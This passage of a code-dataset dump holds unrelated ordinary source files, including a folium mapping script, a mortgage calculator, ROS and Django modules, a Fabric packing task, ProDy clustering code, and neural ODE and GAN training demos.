x['properties']['net_ff']>=100 \\\n else '#80FF00' if x['properties']['net_ff']>=50 \\\n else '#00FFCF' if x['properties']['net_ff']>=10 \\\n else '#00CFFF' if x['properties']['net_ff']>0 \\\n else '#A09898',\n 'fillOpacity': 0.7,\n 'color': 'black',\n 'weight' : 1},\n name='Order Distribution',\n tooltip=fm.GeoJsonTooltip(['zone_name', 'zone_id', 'net_ff'],\n aliases=['Zone Name', 'Zone ID', 'Net FF'])).add_to(dist_map)\n\nlayer = fm.FeatureGroup(name='Apartments')\n\nfor apartment in apartments.itertuples(index=False, name=None):\n apartment_coords = [float(apartment[4].split(',')[0]),\n float(apartment[4].split(',')[1])]\n fm.Marker(location=apartment_coords,\n popup=apartment[0],\n icon=fm.Icon(icon='archway',\n color='black',\n prefix='fa')).add_to(layer)\n\nstore_points = fm.FeatureGroup(name='Stores')\n\nfor store in stores.itertuples(index=False, 
name=None):\n store_coords = [float(store[1].split(',')[0]),\n float(store[1].split(',')[1])]\n fm.Marker(location=store_coords,\n popup=store[0],\n icon=fm.Icon(icon='cart-plus',\n color='pink',\n prefix='fa')).add_to(store_points)\ntemplate = \"\"\"\n{% macro html(this, kwargs) %}\n<!doctype html>\n<html lang='en'>\n<head>\n <meta charset='utf-8'>\n <title>Grocery - 3 Months</title>\n</head>\n<body>\n<div id='maplegend' style='position: absolute; z-index: 9999; right: 20px; bottom: 20px;\n border: 2px solid grey; border-radius: 6px; padding: 10px; font-size: 14px;\n background-color: rgba(255, 255, 255, 0.8);'>\n<div style='font-weight: bold; margin-bottom: 5px;'>Legend</div>\n<div>\n <div><span style='color: #FF2A1C;'>•</span> > 250</div>\n <div><span style='color: #FFC133;'>•</span> > 100</div>\n <div><span style='color: #80FF00;'>•</span> > 50</div>\n <div><span style='color: #00FFCF;'>•</span> > 10</div>\n <div><span style='color: #00CFFF;'>•</span> > 0</div>\n</div>\n</div>\n</body>\n</html>\n{% endmacro %}\"\"\"\n\nmacro = MacroElement()\nmacro._template = Template(template)\n\ndist_map.get_root().add_child(macro)\ndist_map.add_child(layer)\ndist_map.add_child(store_points)\nfm.LayerControl().add_to(dist_map)\nprint('Saving Map...')\n#%%\n\nif service_type == '1':\n dist_map.save(r'C:/Users/{0}/Desktop/grocery_output.html'.format(getpass.getuser()))\n \nelse:\n dist_map.save(r'C:/Users/{0}/Desktop/food_output.html'.format(getpass.getuser()))\n \nprint('Map Saved!')\n","sub_path":"apartment_mapping/apartment_mapping.py","file_name":"apartment_mapping.py","file_ext":"py","file_size_in_byte":8278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"151574314","text":"import sys\n\nmortgage = float(input(\"Enter mortgage amount you wish to borrow: $\"))\ninterestRate = float(input(\"Annual interest rate percentage \"))\nnumYears = float(input(\"Years to clear: \"))\n\n\ninterestRate = interestRate / 1200\nnumYears = numYears * 12\n\npayment = mortgage *((interestRate*(1+interestRate)**numYears)/((1+ interestRate)**numYears -1))\n\npayment = round(payment, 2)\nprint(\"Your Monthly Payment: $\", payment)\n","sub_path":"mortgageProgram.py","file_name":"mortgageProgram.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"210001813","text":"\"\"\"\nMDB.\n\nhttps://github.com/GII/MDB\n\"\"\"\n\n# Standard imports\nimport threading\n\n# Library imports\nimport rospy\n\n# MDB imports\nfrom mdb_ltm.node import Node\n\n\nclass Perception(Node):\n \"\"\"A perception. Its content comes from a sensor or a redescription and it is stored in a memory.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Init attributes when a new object is created.\"\"\"\n super(Perception, self).__init__(**kwargs)\n # Init data storage attributes\n self.old_raw = 0.0\n self.raw = 0.0\n self.old_value = 0.0\n self.value = 0.0\n # Init thread synchronizing stuff\n self.semaphore = None\n self.flag = None\n self.init_threading()\n\n def __getstate__(self):\n \"\"\"Return the object to be serialized with PyYAML as the result of removing the unpicklable entries.\"\"\"\n state = super().__getstate__()\n del state[\"semaphore\"]\n del state[\"flag\"]\n return state\n\n def init_threading(self):\n \"\"\"Create needed stuff to synchronize threads.\"\"\"\n self.semaphore = threading.Semaphore()\n self.flag = threading.Event()\n\n def init_ros(self):\n \"\"\"Create publishers and make subscriptions.\"\"\"\n super().init_ros()\n rospy.logdebug(\"Subscribing to %s...\", self.data_topic)\n rospy.Subscriber(self.data_topic, self.data_message, callback=self.read_callback)\n\n def calc_activation(self, perception=None):\n \"\"\"Calculate the new activation value.\"\"\"\n rospy.logerr(\"Someone called calc_activation on a perception, this should not happen!!!\")\n\n def read_callback(self, reading):\n \"\"\"Get sensor data from ROS topic.\"\"\"\n self.semaphore.acquire()\n rospy.logdebug(\"Receiving \" + self.ident + \" = \" + str(reading))\n self.old_raw = self.raw\n self.raw = reading\n self.old_value = self.value\n self.process_reading()\n self.flag.set()\n self.semaphore.release()\n\n def process_reading(self):\n \"\"\"Process the new sensor reading.\"\"\"\n self.value = []\n self.value.append(dict(data=self.raw.data))\n\n def read(self):\n \"\"\"Obtain a new value for the sensor / redescription.\"\"\"\n self.flag.wait()\n self.flag.clear()\n return self.value\n\n\nclass 
ObjectListPerception(Perception):\n \"\"\"A perception corresponding to a list of objects.\"\"\"\n\n def __init__(self, data=None, **kwargs):\n \"\"\"Init attributes when a new object is created.\"\"\"\n self.normalize_values = data\n super(ObjectListPerception, self).__init__(**kwargs)\n\n def process_reading(self):\n \"\"\"Process the new sensor reading.\"\"\"\n self.value = []\n for perception in self.raw.data:\n distance = (perception.distance - self.normalize_values[\"distance_min\"]) / (\n self.normalize_values[\"distance_max\"] - self.normalize_values[\"distance_min\"]\n )\n angle = (perception.angle - self.normalize_values[\"angle_min\"]) / (\n self.normalize_values[\"angle_max\"] - self.normalize_values[\"angle_min\"]\n )\n diameter = (perception.diameter - self.normalize_values[\"diameter_min\"]) / (\n self.normalize_values[\"diameter_max\"] - self.normalize_values[\"diameter_min\"]\n )\n self.value.append(dict(distance=distance, angle=angle, diameter=diameter, id=perception.id))\n","sub_path":"mdb_ltm/src/mdb_ltm/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"349476978","text":"import numpy as np\nfrom prody import LOGGER, SETTINGS\nfrom prody.utilities import showFigure\nfrom prody.chromatin.functions import _getEigvecs\n\n__all__ = ['calcGNMDomains', 'KMeans', 'Hierarchy', 'Discretize', 'showLinkage']\n\ndef KMeans(V, **kwargs):\n \"\"\"Performs k-means clustering on *V*. The function uses :func:`sklearn.cluster.KMeans`. See the sklearn documentation \n for details.\n\n :arg V: row-normalized eigenvectors for the purpose of clustering.\n :type V: :class:`numpy.ndarray`\n\n :arg n_clusters: specifies the number of clusters. \n :type n_clusters: int\n \"\"\"\n\n try:\n from sklearn.cluster import KMeans\n except ImportError:\n raise ImportError('Use of this function (KMeans) requires the '\n 'installation of sklearn.')\n \n n_clusters = kwargs.get('n_clusters', None)\n if n_clusters is None:\n raise ValueError('KMeans requires the number of clusters to be designated.')\n \n n_init = kwargs.pop('n_init', 100)\n \n kmeans = KMeans(n_init=n_init, **kwargs).fit(V)\n return kmeans.labels_\n\ndef Hierarchy(V, **kwargs):\n \"\"\"Performs hierarchical clustering on *V*. The function essentially uses two scipy functions: ``linkage`` and \n ``fcluster``. See :func:`scipy.cluster.hierarchy.linkage` and :func:`scipy.cluster.hierarchy.fcluster` for the \n explanation of the arguments. Listed here are the arguments that differ from those of scipy.\n\n :arg V: row-normalized eigenvectors for the purpose of clustering.\n :type V: :class:`numpy.ndarray`\n\n :arg inconsistent_percentile: if the clustering *criterion* for :func:`scipy.cluster.hierarchy.fcluster`\n is ``inconsistent`` and threshold *t* is not given (default), then the function will use the percentile specified \n by this argument as the threshold.\n :type inconsistent_percentile: double\n\n :arg n_clusters: specifies the maximal number of clusters. 
If this argument is given, then the function will \n automatically set *criterion* to ``maxclust`` and *t* equal to *n_clusters*.\n :type n_clusters: int\n \"\"\"\n\n from scipy.cluster.hierarchy import linkage, fcluster, inconsistent\n \n method = kwargs.pop('method', 'single')\n metric = kwargs.pop('metric', 'euclidean')\n Z = linkage(V, method=method, metric=metric)\n \n criterion = kwargs.pop('criterion', 'inconsistent')\n t = kwargs.get('t', None)\n ip = kwargs.pop('inconsistent_percentile', 99.9)\n if t is None and criterion == 'inconsistent':\n I = inconsistent(Z)\n i = np.percentile(I[:,3], ip)\n\n t = kwargs.pop('t', i)\n depth = kwargs.pop('depth', 2)\n R = kwargs.pop('R', None)\n monocrit = kwargs.pop('monocrit', None)\n\n n_clusters = kwargs.pop('n_clusters', None)\n if n_clusters is not None:\n criterion = 'maxclust'\n t = n_clusters\n labels = fcluster(Z, t, criterion=criterion, depth=depth, R=R, monocrit=monocrit)\n return labels.flatten()\n\ndef Discretize(V, **kwargs):\n try:\n from sklearn.cluster.spectral import discretize\n except ImportError:\n raise ImportError('Use of this function (Discretize) requires the '\n 'installation of sklearn.')\n\n copy = kwargs.pop('copy', True)\n max_svd_restarts = kwargs.pop('max_svd_restarts', 30)\n n_iter_max = kwargs.pop('n_iter_max', 20)\n random_state = kwargs.pop('random_state', None)\n\n labels = discretize(V, copy=copy, max_svd_restarts=max_svd_restarts, \n n_iter_max=n_iter_max, random_state=random_state)\n return labels\n\ndef showLinkage(V, **kwargs):\n \"\"\"Shows the dendrogram of hierarchical clustering on *V*. See :func:`scipy.cluster.hierarchy.dendrogram` for details.\n\n :arg V: row-normalized eigenvectors for the purpose of clustering.\n :type V: :class:`numpy.ndarray`\n\n \"\"\"\n\n V, _ = _getEigvecs(V, row_norm=True, remove_zero_rows=True)\n try:\n from scipy.cluster.hierarchy import linkage, dendrogram\n except ImportError:\n raise ImportError('Use of this function (showLinkage) requires the '\n 'installation of scipy.')\n \n method = kwargs.pop('method', 'single')\n metric = kwargs.pop('metric', 'euclidean')\n Z = linkage(V, method=method, metric=metric)\n\n no_labels = kwargs.pop('no_labels', True)\n dendrogram(Z, no_labels=no_labels, **kwargs)\n if SETTINGS['auto_show']:\n showFigure()\n return Z\n \ndef calcGNMDomains(modes, method=Hierarchy, **kwargs):\n \"\"\"Uses spectral clustering to separate structural domains in the chromosome.\n \n :arg modes: GNM modes used for segmentation\n :type modes: :class:`ModeSet`\n\n :arg method: Label assignment algorithm used after Laplacian embedding of loci.\n :type method: func\n \"\"\"\n\n V, mask = _getEigvecs(modes, row_norm=True, remove_zero_rows=True)\n\n labels_ = method(V, **kwargs)\n\n labels = np.empty(len(mask))\n labels.fill(np.nan)\n labels[mask] = labels_\n\n currlbl = labels_[np.argmax(~np.isnan(labels_))]\n\n for i in range(len(labels)):\n l = labels[i]\n if np.isnan(l):\n labels[i] = currlbl\n elif currlbl != l:\n currlbl = l\n\n return labels\n ","sub_path":"Docker_Image/dock_group/ProDy/prody/chromatin/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"199717722","text":"# -*- coding: utf-8 -*-\n\nimport requests\nfrom sparrow_cloud.registry.service_discovery import consul_service\nfrom .exception import HTTPException\n\n\ndef get(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: service configuration\n '''\n url = _build_url(service_conf, api_path)\n res = requests.get(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef post(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: the service registry key configured in settings\n '''\n url = _build_url(service_conf, api_path)\n # import pdb; pdb.set_trace()\n res = requests.post(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef put(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: the service registry key configured in settings\n '''\n url = _build_url(service_conf, api_path)\n res = requests.put(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef delete(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: the service registry key configured in settings\n '''\n url = _build_url(service_conf, api_path)\n # import pdb; pdb.set_trace()\n res = requests.delete(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef _build_url(service_conf, api_path):\n servicer_addr = consul_service(service_conf)\n return \"http://{}{}\".format(servicer_addr, api_path)\n\n\ndef _handle_response(response):\n if 200 <= response.status_code < 300:\n if response.content:\n try:\n res_result = response.json()\n except Exception as ex:\n res_result = {\n \"data\": response.content,\n \"message\": str(ex),\n }\n else:\n res_result = {}\n return res_result\n else:\n xx = HTTPException(\n code=\"http_exception\",\n detail=response.content,\n )\n xx.status_code = response.status_code\n raise xx\n","sub_path":"sparrow_cloud/restclient/rest_client.py","file_name":"rest_client.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"169294969","text":"\"\"\"\nPractice 4\nName: 陳彥呈\nStudent Number:109502569\nCourse 2020-CE1003-B\n\"\"\"\ndef func(x,c,y,z):\n\tif c=='+':\n\t\tif x+y==z:return 1\n\telif c=='-':\n\t\tif x-y==z:return 1\n\telif c=='*':\n\t\tif x*y==z:return 1\n\telif c=='/':\n\t\tif x/y==z:return 1\n\treturn 0\ninput_f = open(\"test.txt\",'r')\noutput_f = open(\"ans-109502569.txt\",'w')\nfor line in input_f:\n\tif func(int(line.split()[0]),line.split()[1],int(line.split()[2]),int(line.split()[4])):\n\t\toutput_f.write('T\\n')\n\telse :\n\t\toutput_f.write('F\\n')\ninput_f.close()\noutput_f.close()","sub_path":"P4-109502569/P4-109502569.py","file_name":"P4-109502569.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"139901661","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('page', '0002_applicationcontent_button_campaign_documentsetcontent_facebook_findalocalhealthservice_image_library'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='applicationcontent',\n name='urlconf_path',\n field=models.CharField(max_length=100, verbose_name='application', choices=[('omnis.research.gaps.urls', 'Research gaps'), ('omnis.news.urls', 'News'), ('omnis.research.urls', 'Research'), ('omnis.contact.contact_urls', 'Contact Form'), ('omnis.contact.pals_urls', 'PALS Contact Form'), ('omnis.organisations.member_urls', 'Members'), ('omnis.events.urls', 'Events'), ('omnis.innf.urls', 'INNF'), ('omnis.library.urls', 'Library'), ('omnis.faqs.urls', 'FAQs'), ('omnis.organisations.leader_urls', 'Governors'), ('omnis.nhs_choices.urls', 'Find Local Health Services'), ('omnis.waiting_times_table.urls', 'Waiting Times Table')]),\n ),\n migrations.AlterField(\n 
model_name='singledocumentcontent',\n name='document',\n field=models.ForeignKey(to='library.Document'),\n ),\n ]\n","sub_path":"migrations/page/0003_auto_20160627_1237.py","file_name":"0003_auto_20160627_1237.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"221291874","text":"#!/usr/bin/env python\nimport roslib; roslib.load_manifest('teleop_twist_keyboard')\nimport rospy\n\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import String\n\nimport sys, select, termios, tty\n\ndef getKey():\n\ttty.setraw(sys.stdin.fileno())\n\tselect.select([sys.stdin], [], [], 0)\n\tkey = sys.stdin.read(1)\n\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n\treturn key\n\n\ndef vels(speed,turn):\n\treturn \"currently:\\tspeed %s\\tturn %s \" % (speed,turn)\n\nif __name__==\"__main__\":\n\tsettings = termios.tcgetattr(sys.stdin)\n\tpub = rospy.Publisher('cmd_key', String, queue_size = 1)\n\trospy.init_node('keyboard')\n\t# speed = rospy.get_param(\"~speed\", 0.5)\n\t# turn = rospy.get_param(\"~turn\", 1.0)\n\tstatus = 0\n\ttry:\n\t\t# print vels(speed,turn)\n\t\twhile(1):\n\t\t\tkey = getKey()\n\t\t\tprint(key)\n\t\t\tif (key == '\\x03'):\n\t\t\t\tbreak\n\t\t\tpub.publish(key)\n\texcept Exception as e:\n\t\tprint(e)\n\tfinally:\n\t\t# pub.publish(twist)\n \t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n","sub_path":"scripts/key_direct.py","file_name":"key_direct.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"252251139","text":"#!/usr/bin/python3\n\"\"\" Compressing with fabric, web static to web01/02 \"\"\"\nfrom fabric.api import local\nfrom datetime import datetime\n\ndef do_pack():\n \"\"\" Pack up the front end \"\"\"\n try:\n now = datetime.now()\n\n tarArchiveName = \"web_static_\" + now.strftime(\"%Y%m%d%H%M%S\") + \".tgz\"\n tarArchivePath = \"versions/\" + tarArchiveName\n\n local(\"mkdir -p versions\")\n local(\"tar -czvf \" + tarArchivePath + \" web_static\")\n return tarArchivePath\n except:\n return None\n","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"569186642","text":"r\"\"\"C.f. 
`./test_mnist_dense.py`\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom node.core import get_node_function\nfrom node.fix_grid import RKSolver\nfrom node.utils.initializers import GlorotUniform\n\n\n# for reproducibility\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n\n@tf.function\ndef normalize(x, axis=None):\n M = tf.reduce_max(x, axis, keepdims=True)\n m = tf.reduce_min(x, axis, keepdims=True)\n return (x - m) / (M - m + 1e-8)\n\n\nclass MyLayer(tf.keras.layers.Layer):\n\n def __init__(self, units, dt, num_grids, **kwargs):\n super().__init__(**kwargs)\n self.dt = dt\n self.num_grids = num_grids\n\n t0 = tf.constant(0.)\n self.tN = t0 + num_grids * dt\n\n self._model = tf.keras.Sequential([\n tf.keras.layers.Dense(128, activation='relu',\n kernel_initializer=GlorotUniform(1e-1)),\n tf.keras.layers.Dense(units, activation='relu',\n kernel_initializer=GlorotUniform(1e-1)),\n ])\n self._model.build([None, units])\n\n @tf.function\n def fn(t, x):\n z = self._model(x)\n with tf.GradientTape() as g:\n g.watch(x)\n r = normalize(x, axis=-1)\n return g.gradient(r, x, z)\n\n self._node_fn = get_node_function(\n RKSolver(self.dt), tf.constant(0.), fn)\n\n def call(self, x):\n y = self._node_fn(self.tN, x)\n return y\n\n\ndef process(X, y):\n X = X / 255.\n X = tf.reshape(X, [-1, 28 * 28])\n y = tf.one_hot(y, 10)\n return tf.cast(X, tf.float32), tf.cast(y, tf.float32)\n\n\nmnist = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, y_train = process(x_train, y_train)\nx_test, y_test = process(x_test, y_test)\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Input([28 * 28]),\n tf.keras.layers.Dense(64, activation='relu'),\n MyLayer(64, dt=1e-1, num_grids=10),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(\n optimizer=tf.keras.optimizers.Adam(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\nmodel.fit(x_train, y_train,\n epochs=10,\n validation_data=(x_test, y_test))\n","sub_path":"tests/test_mnist_dense_keras.py","file_name":"test_mnist_dense_keras.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507327958","text":"import numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport torch.functional as func\nfrom torch.autograd import Variable\n\nBATCH_SIZE = 64\nN_IDEAS = 5\nD_LR = 0.0001\nG_LR = 0.0001\nART_COMPONENTS = 15\n\nPOINT_POINTS = torch.cat([torch.linspace(-1, 1, ART_COMPONENTS).view(1, -1) for _ in range(BATCH_SIZE)], 0)\n\n\ndef artist_works():\n a = np.random.uniform(1, 2, size=BATCH_SIZE)[:, np.newaxis]\n paintings = a * torch.pow(POINT_POINTS, 2).numpy() + (a - 1)\n paintings = torch.from_numpy(paintings).float() # .type(torch.FloatTensor)\n return Variable(paintings)\n\n\n# plt.plot(POINT_POINTS[0].numpy(),2*torch.pow(POINT_POINTS[0],2).numpy()+1)\n# plt.plot(POINT_POINTS[0].numpy(),1*torch.pow(POINT_POINTS[0],2).numpy())\n# plt.show()\n\nD = torch.nn.Sequential(\n torch.nn.Linear(ART_COMPONENTS, 128),\n torch.nn.ReLU(),\n torch.nn.Linear(128, 1),\n torch.nn.Sigmoid(),\n)\n\nG = torch.nn.Sequential(\n torch.nn.Linear(N_IDEAS, 128),\n torch.nn.ReLU(),\n torch.nn.Linear(128, ART_COMPONENTS),\n)\n\nD_optimzer = torch.optim.Adam(D.parameters(), lr=D_LR)\nG_optimzer = torch.optim.Adam(G.parameters(), lr=G_LR)\n\nfor epoch in range(10000):\n artist_paints = artist_works()\n G_ideas = Variable(torch.randn(BATCH_SIZE, N_IDEAS))\n G_paints = G(G_ideas)\n prob_artist0 = 
D(artist_paints)\n prob_artist1 = D(G_paints)\n loss_D = -torch.mean(torch.log(prob_artist0) + torch.log(1. - prob_artist1))\n loss_G = torch.mean(torch.log(1. - prob_artist1))\n\n D_optimzer.zero_grad()\n loss_D.backward(retain_variables=True)\n D_optimzer.step()\n\n G_optimzer.zero_grad()\n loss_G.backward()\n G_optimzer.step()\n\n if epoch % 1000 == 0:\n plt.plot(POINT_POINTS[0].numpy(), 2 * torch.pow(POINT_POINTS[0], 2).numpy() + 1, lw=3, c='red',\n label='Upper Bound')\n plt.plot(POINT_POINTS[0].numpy(), 1 * torch.pow(POINT_POINTS[0], 2).numpy(), lw=3, c='green',\n label='Lower Bound')\n plt.plot(POINT_POINTS[0].numpy(), G_paints.data.numpy()[0], lw=2, c='yellow', label='Generated Paint')\n plt.text(-0.5, 2.3, 'D accuracy = %.2f' % prob_artist0.data.numpy().mean())\n plt.text(-0.5, 2, 'D score = %.2f' % -loss_D.data.numpy())\n plt.legend(loc='best')\n # plt.pause(0.5)\n plt.show()\n","sub_path":"pytorch_step1/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"228010400","text":"\n\n#calss header\nclass _FASTENING():\n\tdef __init__(self,): \n\t\tself.name = \"FASTENING\"\n\t\tself.definitions = [u'a device on a window, door, box, etc. for keeping it closed']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_fastening.py","file_name":"_fastening.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"262105502","text":"from collections import deque\nimport copy, sys\ninput = sys.stdin.readline\n\nn = int(input())\na = [deque(map(lambda x: int(x) - 1, input().split())) for _ in range(n)]\nq = deque()\npre_q = deque()\nday = 0\n\ndef check(p, q):\n if not len(a[p]):\n return\n o = a[p][0]\n if p == a[o][0]:\n if p > o: p, o = o, p\n if not (p, o) in q:\n q.append((p, o))\n\nfin = []\nfor p in range(n):\n if not p in fin:\n o = a[p][0]\n if p == a[o][0]:\n q.append((p, o))\n fin += [p, o]\n\nwhile q:\n day += 1\n pre_q = copy.copy(q)\n q.clear()\n for (p, o) in pre_q:\n a[p].popleft()\n a[o].popleft()\n check(p, q)\n check(o, q)\n\nif all(map(len, a)):\n print(-1)\nelse:\n print(day)\n","sub_path":"ABC/ABC139/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"564773470","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.db.models.deletion\nimport oscar.core.validators\nimport django.utils.timezone\nfrom django.conf import settings\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('catalogue', '0002_auto_20150217_1221'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ProductGroup',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200, verbose_name='\\u540d\\u5b57')),\n ],\n options={\n 'verbose_name': '\\u4ea7\\u54c1\\u7ec4',\n 'verbose_name_plural': '\\u4ea7\\u54c1\\u7ec4',\n },\n ),\n migrations.CreateModel(\n name='SearchFilter',\n fields=[\n ('id', 
models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('search_value', models.CharField(help_text='\\u533a\\u95f4\\u503c\\u8bbe\\u7f6e\\u6210 eg:30\\u5ea6-40\\u5ea6', max_length=120, null=True, verbose_name='\\u641c\\u7d22\\u503c', blank=True)),\n ('value_range', models.CharField(choices=[(b'>', '\\u4ee5\\u4e0a'), (b'<', '\\u4ee5\\u4e0b')], max_length=120, blank=True, help_text='\\u4e0d\\u662f\\u8303\\u56f4\\u7684\\u5c5e\\u6027\\u503c\\u4e3a\\u7a7a', null=True, verbose_name='\\u9009\\u62e9\\u8303\\u56f4')),\n ('search_order', models.IntegerField(null=True, verbose_name='\\u641c\\u7d22\\u503c\\u6392\\u5217\\u987a\\u5e8f', blank=True)),\n ('chose', models.BooleanField(default=True, verbose_name='\\u9009\\u62e9\\u8be5\\u641c\\u7d22\\u503c')),\n ],\n options={\n 'ordering': ['attribute'],\n 'verbose_name': '\\u641c\\u7d22\\u5c5e\\u6027\\u914d\\u7f6e',\n 'verbose_name_plural': '\\u641c\\u7d22\\u5c5e\\u6027\\u914d\\u7f6e',\n },\n ),\n migrations.AddField(\n model_name='category',\n name='product_class',\n field=models.ForeignKey(related_name='categories', blank=True, to='catalogue.ProductClass', help_text='\\u9009\\u62e9\\u5206\\u7c7b\\u7684\\u7c7b\\u5c5e\\u6027\\uff0c\\u7ed1\\u5b9a\\u5206\\u7c7b\\u5546\\u54c1\\u5c5e\\u6027\\u503c', null=True, verbose_name='\\u5206\\u7c7b\\u7c7b\\u5c5e\\u6027'),\n ),\n migrations.AddField(\n model_name='product',\n name='browse_num',\n field=models.BigIntegerField(default=0, verbose_name='\\u6d4f\\u89c8\\u6b21\\u6570'),\n ),\n migrations.AddField(\n model_name='product',\n name='featured_hot',\n field=models.BooleanField(default=False, verbose_name='\\u4e3b\\u63a8\\u70ed\\u5356'),\n ),\n migrations.AddField(\n model_name='product',\n name='hot_deals',\n field=models.BooleanField(default=False, verbose_name='\\u706b\\u70ed\\u4fc3\\u9500'),\n ),\n migrations.AddField(\n model_name='product',\n name='is_associate',\n field=models.BooleanField(default=False, verbose_name='\\u662f\\u5426\\u5173\\u8054'),\n ),\n migrations.AddField(\n model_name='product',\n name='is_on_shelves',\n field=models.BooleanField(default=True, verbose_name='\\u662f\\u5426\\u4e0a\\u67b6'),\n ),\n migrations.AddField(\n model_name='product',\n name='new_listing',\n field=models.BooleanField(default=False, verbose_name='\\u65b0\\u54c1\\u4e0a\\u5e02'),\n ),\n migrations.AddField(\n model_name='product',\n name='opening_date',\n field=models.DateField(default=django.utils.timezone.now, verbose_name='\\u4e0a\\u5e02\\u65f6\\u95f4'),\n ),\n migrations.AddField(\n model_name='product',\n name='product_long_image',\n field=models.ImageField(upload_to=b'images/products/%Y/%m/', null=True, verbose_name='\\u5e7f\\u544a\\u957f\\u56fe', blank=True),\n ),\n migrations.AddField(\n model_name='product',\n name='selection_reputation',\n field=models.BooleanField(default=False, verbose_name='\\u53e3\\u7891\\u7504\\u9009'),\n ),\n migrations.AddField(\n model_name='product',\n name='trader',\n field=models.ForeignKey(related_name='trader', verbose_name='\\u4ea4\\u6613\\u5458', blank=True, to=settings.AUTH_USER_MODEL, null=True),\n ),\n migrations.AddField(\n model_name='productattribute',\n name='index',\n field=models.IntegerField(null=True, verbose_name='\\u6392\\u5e8f', blank=True),\n ),\n migrations.AddField(\n model_name='productattribute',\n name='search_filter',\n field=models.BooleanField(default=True, help_text='\\u8bbe\\u7f6e\\u4e0d\\u9700\\u8981\\u641c\\u7d22\\u7684\\u5c5e\\u6027\\u503c', verbose_name='\\u662f\\u5426\\u641c\\u7d22'),\n ),\n 
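# The AlterField entries below realign existing catalogue columns;\n        # the trailing AddField calls add the new cross-model relations.\n        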
migrations.AlterField(\n            model_name='category',\n            name='slug',\n            field=models.SlugField(max_length=255, verbose_name='Slug'),\n        ),\n        migrations.AlterField(\n            model_name='product',\n            name='product_class',\n            field=models.ForeignKey(related_name='products', on_delete=django.db.models.deletion.PROTECT, blank=True, to='catalogue.ProductClass', help_text='Choose what type of product this is', null=True, verbose_name='Product type'),\n        ),\n        migrations.AlterField(\n            model_name='productattribute',\n            name='code',\n            field=models.SlugField(max_length=128, verbose_name='Code', validators=[django.core.validators.RegexValidator(regex=b'^[a-zA-Z_][0-9a-zA-Z_]*$', message=\"Code can only contain the letters a-z, A-Z, digits, and underscores, and can't start with a digit\"), oscar.core.validators.non_python_keyword]),\n        ),\n        migrations.AddField(\n            model_name='searchfilter',\n            name='attribute',\n            field=models.ForeignKey(verbose_name='Attribute', to='catalogue.ProductAttribute'),\n        ),\n        migrations.AddField(\n            model_name='productgroup',\n            name='attr',\n            field=models.ManyToManyField(related_name='product_group_attr', 